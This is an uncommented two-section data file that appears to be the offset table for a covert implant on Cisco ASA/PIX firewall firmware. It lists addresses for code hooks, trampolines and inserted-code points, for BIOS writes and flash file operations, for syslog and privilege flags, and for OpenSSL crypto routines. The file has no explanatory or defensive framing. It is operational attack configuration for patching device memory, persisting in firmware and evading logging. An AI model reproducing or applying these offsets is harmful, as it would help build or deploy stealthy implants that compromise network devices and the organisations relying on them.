; --- SECTION I ---
;
0x40080400
0x1d4b000 
0x0   0x089bd690
0x1   0x089bcff0
0x2   0x080619c0
0x3   0x084bc140
0x4   0x08061b20
0x5   0x09154880
0x6   0x09185e4c
0x7   0x0916bbb0
0x8   0x089bce60
0x9   0x0916b630
0xa   0x080612d0
0xb   0x00000014
0xc   0x00000010
0xd   0x00000068
0xe   0x00000084
0xf   0x0916d3a0
0x15  0x0805fe20
0x16  0x0805f7c0
0x17  0x0805eff0
0x18  0x087fde40
0x19  0x0000001c
0x1a  0x09b7a6a0
0x1b  0x04
0x1c  0x0c
0x1d  0x24
0x1e  0x10
0x1f  0x20
0x20  0x084bf210
0x21  0x084c0200
0x22  0x084be670
0x23  0x084cfd80
0x24  0x08778af0
0x25  0x08778d90
0x26  0x084ba2f0
0x27  0x084c2020
0x28  0x088592a0
0x2a  0x3c
0x2b  0x34
0x2c  0x1c
0x2e  0x000001ac
0x2f  0x09a9e100
0x30  0x096fbd00
0x31  0x00000014
0x32  0x00000020
0x33  0x00000018
0x34  0x09aab054
0x35  0x09b7aec0
0x36  0x08856d60
0x37  0x00000153
0x38  0x10
0x39  0x00
0x3a  0x00000424
0x3b  0x08416990
0x3c  0x08416a70
0x3d  0x08415fd0
0x3e  0x084168b0
0x3f  0x00000018
0x40  0x09b9b0c0
0x42  0x09184680
0x43  0x084adc50
0x44  0x0835c58f
0x45  0x01a1d858
0x46  0xffffffff
0x47  0x2c
0x49  0x08048000
0x4a  0x09625000
0x52  0x084ee820
;
; --- END OF SECTION I ---
;
:EOS:
;
; --- SECTION II ---
;
HookLocation              0x0866012a
HookedCall                0x08663920
JmpLocation               0x0906f37a
InterfaceAddr             0x096fbd00
InterfaceLeng             0x00000218
IntSecurityOffset         0x1c
IntNameOffset             0x000001e8
IntNumOffset              0x00000153
IntVlanOffset             0x10
IntIPOffset               0x20
IntNetmaskOffset          0x24
FlashClassAddr            0x00000000
CryptoDeviceAddr          0x09b80844
ArpTableAddrPtr           0x096ebd08
NumInterfaces             0x00000000
IfaceStruct2              0x00000000
IfaceStruct2Len           0x00
BiosClassAddr             0x09b8c9e0
BiosWriteAddr1            0x08355660
BiosWriteAddr2            0x08357e50
BiosWriteAddr3            0x083578e0
BiosWriteAddr4            0x08358730
BiosWriteOffset           0x00000020
FlashMkdirAddress         0x08417580
ASAFlashRmdirAddress      0x0835d2d0
PIXFlashRmdirAddress      0x08344fb0
ASAFlashRmfileAddress     0x0835cdc0
PIXFlashRmfileAddress     0x08344c90
FlashDirlistAddress       0x08416c70
FlashGetSizeAddress       0x08417860
FlashChmodAddress         0x08417110
FlashMoveFileAddress      0x08417270
FlashGetFileInfoAddress   0x00000000
FlashGetSpaceAddress      0x084186e0
FlashFileInfoSizeOffset   0x0000002c
GetPlatformStringAddr     0x0917c9d0
ASARestatFlashFlagAddr    0xffffffff
AnnounceFunc              0x080617b0
DevIoctlOffset            0x70
DuartTtyAddr              0x096595c0
CIStartFunc               0x080b19e0
CommandListAddr           0x09724ba0
DeviceListPtrAddr         0x09a68f68
DeviceNextPtrOffset       0x50
StrcmpFuncAddr            0x09171300
SyslogFlagPtrAddr         0x09cfa500
PGDGETValue               0x85b00002
PGDPUSHValue              0x85b00003
PGDSETValue               0x85b00000
StdChOffset               0x84
StdErrOffset              0x88
PrivFlagOffset            0x0c
UnameOffset               0x14
EnvPtrOffset              0x90
SyslogOffset              0x00000b38
Open                      0x080619c0
ChannelConfigOffset       0x08
InputModeOffset           0x14
InputModeEsc              0x20
WatchDogTimeout           0x09626520
UpTimeCounter             0x09b7aec0
Display_uptime_addr       0x080b9920
Inserted_code_addr        0x0906f37a
i2cReadByte               0x08d8bce0
i2cWriteByte              0x08d8bb60
CLIHookAddress            0x080b1e9a
AvailMemoryPtr            0x09c8c3e0
;
;
srand                     0x0916d400
BN_new                    0x090b7a50
BN_free                   0x090b79c0
BN_mod_exp                0x090ef9c0
BN_CTX_new                0x090d4a10
BN_CTX_free               0x090d4cc0
BN_bin2bn                 0x090b8810
BN_bn2bin                 0x090b82e0
BN_bn2hex                 0x090d6d40
BN_num_bits               0x090b8180
DH_p                      0x0963db80
EVP_CIPHER_CTX_init       0x090bbec0
EVP_CipherUpdate          0x090bc360
EVP_CIPHER_CTX_cleanup    0x090bc6b0
EVP_CipherFinal           0x090bc7a0
EVP_CipherInit_ex         0x090bcc00
EVP_aes_128_cbc           0x090bed60
slimHookAddr              0x08660c93
slimTrampoline1           0x080612c1
slimTrampoline2           0x0807bef1
HookByte1                 0x8b
HookBytes2to5             0xff85687b
InterfaceOffset           0x0000000c
codepageBase              0x00000000
osVerAddr                 0x096254e0
textSize                  0x011adcb4
;
; --- END OF SECTION II ---
;
:EOS:
;
